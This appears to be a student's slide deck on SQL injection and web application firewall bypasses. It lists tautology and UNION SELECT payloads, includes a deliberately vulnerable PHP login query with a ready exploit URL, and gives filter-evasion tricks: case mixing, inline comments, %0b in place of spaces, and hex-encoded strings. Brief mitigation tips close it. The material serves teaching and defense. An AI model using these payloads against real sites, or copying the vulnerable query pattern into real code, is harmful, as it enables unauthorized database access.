All Ab0ut 0f SQL Injection
and WAF Bypass Techniques
THATSANAI DETDAMRONGPREEECHA
COMPUTER SCIENCE @ KING MONGKUT'S INSTITUTE OF TECHNOLOGY LADKRABANG
What is SQL Injection ?

Sql injection is code injection

Happened when user Inject sql command for change condition

because develop not filtered input from user
Logical Conjunction and
Disjunction table
SQL Operator

And , &&

Or , ||

Like

*

(,)

<,>

+, - , *, /, %
SQL Comment
end of the line

"#"

"--"

"-- "
multiple line

/* */
Examples
vulnerability and inject command
sql command :
SELECT first_name, last_name FROM users WHERE user_id = '$id‘
Inject code :
SELECT first_name, last_name FROM users WHERE user_id = '1‘ or ‘1’
SELECT
SELECT
SELECT
SELECT
SELECT
SELECT
first_name, last_name FROM users WHERE
first_name, last_name FROM users WHERE
first_name, last_name FROM users WHERE
first_name, last_name FROM users WHERE
first_name, last_name FROM users WHERE
first_name, last_name FROM users WHERE
user_id = 'am’ or ‘am’
user_id = ' ‘ or ‘1’=‘1’
user_id = ' ‘ or ‘2600’=‘2600’
user_id = ' ‘ or ‘HELLO’ or ‘HELLO’
user_id = ' ‘ or 1 #’
user_id = ' ‘ or true #’
sql command :
SELECT first_name, last_name FROM users WHERE user_id = $id
Inject code :
true
‘1’ or ‘1’
2 or 2
sql command :
SELECT first_name, last_name FROM users WHERE user_id = ($id)
Inject code :
1) or (1
2+3) or (5
http://cs.ssru.ac.th/cs01/mae/Pae/ตัวอย่างและโปรแกรมทีโ่ หลดๆมา/Login_thaicreate/PHP MySQL กับ Login
Form ทาระบบ User ล็อกอิ น แบบง่าย ๆ ด้วย PHP และ MySQL โดยทาการตรวจสอบ Username และ Password.htm
http://www.santosh143.com/2013/05/how-to-create-loginregister-system.html
http://www.exploit-db.com/exploits/26405/
http://www.exploit-db.com/exploits/26416/
Example

$sql = "SELECT * FROM members WHERE password='".md5($_GET['password'])."' AND
username='".$_GET['username']."'";

$result = mysql_query($sql, $db);

if ($result === FALSE)
die('Invalid SQL query');



if (mysql_num_rows($result) == 1) {
echo "Congrats, WIN!!!\n";


}

else {
echo "The number of rows is not 1\n";


}
login_sqli1.php?password=whatever&username='+or+1=1+LIMIT+1#
Impact

Get Information in database

Can gaining access system

Etc.
Bypass
Web Application Firewall Techniques
What is Web Application Firewall

Web application Firewall ( WAF )

Software or Hardware

Emphasis in prevention on the website

Filters all data in application layer

Can detected and prevention website
How to Bypass


?
Original

1’ or ‘1’=‘1

union all select 1,2,3,4,5 –

union all select 1,2,@@version,4,5 –
Solution

1’ oR ‘1’=‘1

uNIon AlL sELeCt 1,2,3,4,5 –

u/*2600*/ni/*12345*/on a/*..*/lL se/*AAAA*/lEct 1,2,@@VerSIon,4,5 --
How to Bypass

If Filter or , and

Solve :
?

Using || instead of or

Using && instead of and
(cont.)
How to Bypass

If Filter where

Solve :

(cont.)
Using limit instead of where

If Filter limit

Solve :

?
You can Using group by and having instead of where
How to Bypass

If Filter whitespace

Solve :

(cont.)
Using %0b instead of whitespace

If Filter ‘

Solve :

?
Using 0xXX , unhex(xx) instead of ‘
How to Mitigation
Top 5 Secure Coding Tips for PHP applications

Filter Input Data

GET , POST , COOKIE
Securing Database Queries
 Filter Output Data




htmlspecialchars()

htmlentities()

strip_tags()

strtr()
Error Handling

log_errors = On

display_errors = Off
Preventing other injection attacks
References and Appendix

www.owasp.org

http://palpapers.plynt.com/issues/2009Dec/secure-coding-php/

http://dev.mysql.com/doc/refman/5.0/en/non-typedoperators.html

http://thtutz.blogspot.com